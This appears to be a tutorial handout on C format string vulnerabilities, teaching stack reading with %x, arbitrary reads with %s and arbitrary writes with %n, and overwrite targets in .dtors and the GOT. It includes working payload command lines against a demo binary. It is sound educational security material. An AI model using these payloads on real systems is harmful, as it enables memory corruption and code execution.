Format String Exploits
1 - A history lesson
Buffer Overflows have been around since the mid 80's. THE doc on stack
overflows was written in:
P H R A C K 4 9
November 08, 1996
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Smashing The Stack For Fun And Profit
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
by Aleph One
Since the discovery of buffer overflows there have been a few thousand in the
wild.
Format string exploits were made public in June 1999. Only a few dozen
have been seen.
Application            Found by         Impact        years
-------------------------------------------------------------------------
wu-ftpd 2.*            security.is      remote root   > 6
Linux rpc.statd        security.is      remote root   > 4
IRIX telnetd           LSD              remote root   > 8
Qualcomm Popper 2.53   security.is      remote user   > 3
Apache + PHP3          security.is      remote user   > 2
NLS / locale           CORE SDI         local root    ?
screen                 Jouko Pynnonen   local root    > 5
BSD chpass             TESO             local root    ?
OpenBSD fstat          ktwo             local root    ?
(Table taken from: http://www.cs.ucsb.edu/~jzhou/security/formats-teso.html )
2 - What is a format string?
- Question: How do you output data in a C program?
answer
- Let's take a look at an example of format strings in action.
example1
3 - Malformed Format Strings
- Recall from example1 the use of the %x format string.
It prints in hex the data located in the memory of the
appropriate argument to the printf() call.
- Question: What happens when the number of format strings and the number
of arguments are not equal??
answer
- What does this really mean? Well... let's see the code:
example2
- Where exactly is the data that's being read? If you've been paying
attention to the other talks, you should know this... But if I have to
spell it out for you...
When printf("%d %08x.%08x.%08x.%08x.%08x.%08x.%08x.", i); is
called, just like any other function, its arguments are pushed onto the
stack, followed by the return address of the function, saved frame pointer,
and local variables of that function.
Below is a (hopefully) familiar diagram of the stack when printf() is
called (note that the stack grows down in the figure):
+---------+
| old |
+---------+
| data |
+---------+ <- 'top' of stack before call to printf()
| i |
+---------+
| fmt_str |
+---------+
| ret |
+---------+
| sfp |
+---------+ <- 'top' of stack after call to printf()
The first %d looks at the memory location that the first argument
*should* be at, in this case 'i' is located there. The next %08x will
look at the next memory location on the stack, where it expects to find
the 2nd argument... instead it finds old data left on the stack from
before the function call.
- That's great, but who cares?
It is unlikely that a programmer will string together a ton of %x for no
reason except to let you view the contents of the stack. But there is
something a programmer might do...
4 - The vulnerability
- The right way to print a string:
printf("%s", buf);
- The wrong way to print a string:
printf(buf);
See: example3
- When a programmer makes the mistake of letting you control the format
strings, all hell breaks loose...
We can read from the stack above us as before:
./a.out `perl -e 'print "%08x."x40;'`
Notice the bytes: 0x25 0x30 0x38 0x78 0x2e are repeated quite a lot. These bytes are
actually the ASCII characters: %08x. Since the string passed to printf() is
stored on the stack before the call is made (in our case into the buffer
'text'), eventually we will be reading the memory of the format string itself.
This is a *good* thing.
- What would happen if instead of using so many %08x we put something
useful at the start of our format string?
./a.out `perl -e 'print "\x7d\xfb\xff\xbf"'`%08x.%08x.%08x.%s
We can now read from arbitrary memory locations!
- But wait, there's more... remember our friend %n ? What we did with %s
for reading, we can do with %n for writing.
If you remember the line:
** test_num @ 0x080496dc = -72 = 0xffffffb8
We will now use its address as a location to write to...
./a.out `perl -e 'print "\xdc\x96\x04\x08"'`%08x.%08x.%08x.%n
The %n will write, to whatever address we pass it, the number of bytes
printed up to that point. In this case it outputs:
** test_num @ 0x080496dc = 31 = 0x0000001f
What is this 31?? So, our string we passed to printf has "\xdc\x96\x04\x08"
which is 4 bytes. And then if you were paying attention to what is
printed by %08x you would see that it prints 8 characters. 8 x 3 = 24,
plus the 3 `.' characters. 24 + 3 + 4 = 31
We can change the field width of %x to any number we want to control
what gets written by %n.
./a.out `perl -e 'print "\xdc\x96\x04\x08"'`%08x.%08x.%080x.%n
** test_num @ 0x080496dc = 103 = 0x00000067
- What we can do now is write to any arbitrary memory location. But writing
the number of %08x and other crap in our format string isn't that useful...
or is it?
If we want to write something like 0xDDCCBBAA, which has the form of a
memory address, we can use multiple %n conversions aimed at 4 consecutive
byte addresses. That way we can overlap small values byte by byte, instead
of trying to print a gigantic number of bytes to the screen or file.
Conceptually it looks like this:
AA 00 00 00 | 0x080496dc
BB 00 00 00 | 0x080496dd
CC 00 00 00 | 0x080496de
DD 00 00 00 | 0x080496df
----------------------|
AA BB CC DD | Result starting at 0x080496dc
After re-writing this in the correct byte order: 0xDDCCBBAA
In code we need to specify each address we want to write to, and use
one %n per address (four in total) to write data to each location.
./a.out `perl -e 'print "\xdc\x96\x04\x08JUNK\xdd\x96\x04\x08"'`%x.%x.%146x.%n%017x%n
The JUNK is there because we need a %x between each pair of %n to
increase the count that will be written, and that %x consumes one 4-byte
argument from the stack. The above example will write 0x0000bbaa to
test_num.
I will leave the task of writing all four bytes as an exercise for the
reader.
- Now, what if we want to write a more legit looking address: 0x0806abcd
Well first we need to print 205 bytes (0xcd) total, for the first %n, then
we need to print a total of 171 bytes (0xab) ... What's wrong with this?
It should be obvious...
answer
5 - A better way
- Direct Parameter Access allows us to eliminate a lot of the JUNK (pun
intended).
An example of direct parameter access:
printf("Argument 7: %7$d, Argument 2: %2$d \n", 10, 20, 30, 40, 50, 60, 70, 80);
By using %7$d, we tell this particular format string to access the
memory for the 7th argument. We can now re-write our previous example:
./a.out `perl -e 'print "\xdc\x96\x04\x08\xdd\x96\x04\x08"'`%3\$161x.%4\$n%3\$17x%5\$n
6 - The Exploit
- So, we can read from and write to any memory address we want. What and
where do we want to write? Well... if you want, you can overwrite the
return address of the stack frame above you, just like a stack overflow.
But with format strings we're not limited by the same constraints as an
overflow. We can choose to overwrite sections of memory that are more
predictable...
- Enter .dtors. GCC compiled programs contain two special
sections called .ctors and .dtors. These sections are made for
constructors and destructors. But wait, C doesn't have constructors and
destructors you fool... well, not in the object oriented sense, no... but
GCC does let you write functions that are called just before main starts,
and just after it exits.
See: example4
Let's take a look at the symbols...
$ nm a.out
080495f0 A __bss_start
08048330 t call_gmon_start
080483e6 t cleanup
080495f0 b completed.4577
080494e8 d __CTOR_END__
080494e4 d __CTOR_LIST__
080495e4 D __data_start
080495e4 W data_start
08048464 t __do_global_ctors_aux
08048354 t __do_global_dtors_aux
080495e8 D __dso_handle
080494f4 d __DTOR_END__
080494ec d __DTOR_LIST__
080494fc D _DYNAMIC
080495f0 A _edata
080495f4 A _end
U exit@@GLIBC_2.0
0804848c T _fini
080494e4 A __fini_array_end
080494e4 A __fini_array_start
080484a8 R _fp_hw
08048388 t frame_dummy
080484e0 r __FRAME_END__
080495c8 D _GLOBAL_OFFSET_TABLE_
w __gmon_start__
080482a4 T _init
080494e4 A __init_array_end
080494e4 A __init_array_start
080484ac R _IO_stdin_used
080494f8 d __JCR_END__
080494f8 d __JCR_LIST__
w _Jv_RegisterClasses
0804845c T __libc_csu_fini
08048400 T __libc_csu_init
U __libc_start_main@@GLIBC_2.0
080483b0 T main
080495ec d p.4576
080494e4 A __preinit_array_end
080494e4 A __preinit_array_start
U puts@@GLIBC_2.0
0804830c T _start
$ objdump -s -j .dtors ./a.out
./a.out: file format elf32-i386
Contents of section .dtors:
80494ec ffffffff e6830408 00000000 ............
As you can see, the nm command shows you the addresses of the start and
end of .dtors. Comparing with the objdump output of the .dtors section, you
can see that __DTOR_LIST__ is the start of .dtors, and that this address
always contains ffffffff. __DTOR_END__ marks the end of the list (and
always contains 00000000). In between the two addresses is the address of
our cleanup function: e6830408 is 0x080483e6 in little-endian byte order,
which matches cleanup in the nm output.
$ objdump -h ./a.out
./a.out: file format elf32-i386
Sections:
Idx Name Size VMA LMA File off Algn
0 .interp 00000013 08048114 08048114 00000114 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
1 .note.ABI-tag 00000020 08048128 08048128 00000128 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
2 .hash 00000030 08048148 08048148 00000148 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
3 .dynsym 00000070 08048178 08048178 00000178 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
4 .dynstr 00000063 080481e8 080481e8 000001e8 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
5 .gnu.version 0000000e 0804824c 0804824c 0000024c 2**1
CONTENTS, ALLOC, LOAD, READONLY, DATA
6 .gnu.version_r 00000020 0804825c 0804825c 0000025c 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
7 .rel.dyn 00000008 0804827c 0804827c 0000027c 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
8 .rel.plt 00000020 08048284 08048284 00000284 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
9 .init 00000017 080482a4 080482a4 000002a4 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
10 .plt 00000050 080482bc 080482bc 000002bc 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
11 .text 00000180 0804830c 0804830c 0000030c 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
12 .fini 0000001a 0804848c 0804848c 0000048c 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
13 .rodata 00000037 080484a8 080484a8 000004a8 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
14 .eh_frame 00000004 080484e0 080484e0 000004e0 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
15 .ctors 00000008 080494e4 080494e4 000004e4 2**2
CONTENTS, ALLOC, LOAD, DATA
16 .dtors 0000000c 080494ec 080494ec 000004ec 2**2
CONTENTS, ALLOC, LOAD, DATA
17 .jcr 00000004 080494f8 080494f8 000004f8 2**2
CONTENTS, ALLOC, LOAD, DATA
18 .dynamic 000000c8 080494fc 080494fc 000004fc 2**2
CONTENTS, ALLOC, LOAD, DATA
19 .got 00000004 080495c4 080495c4 000005c4 2**2
CONTENTS, ALLOC, LOAD, DATA
20 .got.plt 0000001c 080495c8 080495c8 000005c8 2**2
CONTENTS, ALLOC, LOAD, DATA
21 .data 0000000c 080495e4 080495e4 000005e4 2**2
CONTENTS, ALLOC, LOAD, DATA
22 .bss 00000004 080495f0 080495f0 000005f0 2**2
ALLOC
23 .comment 0000010e 00000000 00000000 000005f0 2**0
CONTENTS, READONLY
The above objdump shows the section headers. Notice that .dtors is not
READONLY. So, what we can do is use our format string exploit to overwrite
an entry in the .dtors section with the address of some shellcode.
TODO: Working example.
- The Global Offset Table
$ objdump -d -j .plt c.out
c.out: file format elf32-i386
Disassembly of section .plt:
08048304 :
8048304: ff 35 e0 96 04 08 pushl 0x80496e0
804830a: ff 25 e4 96 04 08 jmp *0x80496e4
8048310: 00 00 add %al,(%eax)
...
08048314 :
8048314: ff 25 e8 96 04 08 jmp *0x80496e8
804831a: 68 00 00 00 00 push $0x0
804831f: e9 e0 ff ff ff jmp 8048304 <_init+0x18>
08048324 <__libc_start_main@plt>:
8048324: ff 25 ec 96 04 08 jmp *0x80496ec
804832a: 68 08 00 00 00 push $0x8
804832f: e9 d0 ff ff ff jmp 8048304 <_init+0x18>
08048334 :
8048334: ff 25 f0 96 04 08 jmp *0x80496f0
804833a: 68 10 00 00 00 push $0x10
804833f: e9 c0 ff ff ff jmp 8048304 <_init+0x18>
08048344 :
8048344: ff 25 f4 96 04 08 jmp *0x80496f4
804834a: 68 18 00 00 00 push $0x18
804834f: e9 b0 ff ff ff jmp 8048304 <_init+0x18>
08048354 <__gmon_start__@plt>:
8048354: ff 25 f8 96 04 08 jmp *0x80496f8
804835a: 68 20 00 00 00 push $0x20
804835f: e9 a0 ff ff ff jmp 8048304 <_init+0x18>
08048364 :
8048364: ff 25 fc 96 04 08 jmp *0x80496fc
804836a: 68 28 00 00 00 push $0x28
804836f: e9 90 ff ff ff jmp 8048304 <_init+0x18>